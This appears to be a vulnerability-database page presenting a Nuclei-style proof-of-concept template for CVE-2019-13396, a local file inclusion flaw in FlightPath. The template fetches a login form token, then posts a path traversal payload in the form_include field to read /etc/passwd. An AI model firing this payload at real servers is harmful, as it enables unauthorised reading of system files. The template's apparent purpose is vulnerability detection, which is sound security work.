CVE-2019-13396: FlightPath - Local File Inclusion

2025-08-01 FlightPath PoC Public

Description

FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.

PoC

id: CVE-2019-13396

info:
  name: FlightPath - Local File Inclusion
  author: 0x_Akoko,daffainfo
  severity: medium
  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47121
    - http://getflightpath.com/node/2650
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-13396
    cwe-id: CWE-22
    epss-score: 0.62572
    epss-percentile: 0.99147
    cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: getflightpath
    product: flightpath
  tags: cve,cve2019,flightpath,lfi,edb,getflightpath,vuln,vkev

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "idden' name='form_token' value='([a-z0-9]+)'>"
        internal: true
        part: body
# digest: 490a00463044022007b42214d93ed08228c485f4bdcad2c9415501ff7fa0f01920440056880323fb0220232272c645fadb6140bf2e86851e5a211f1a115c2752d83e0d706094c54cf6bc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities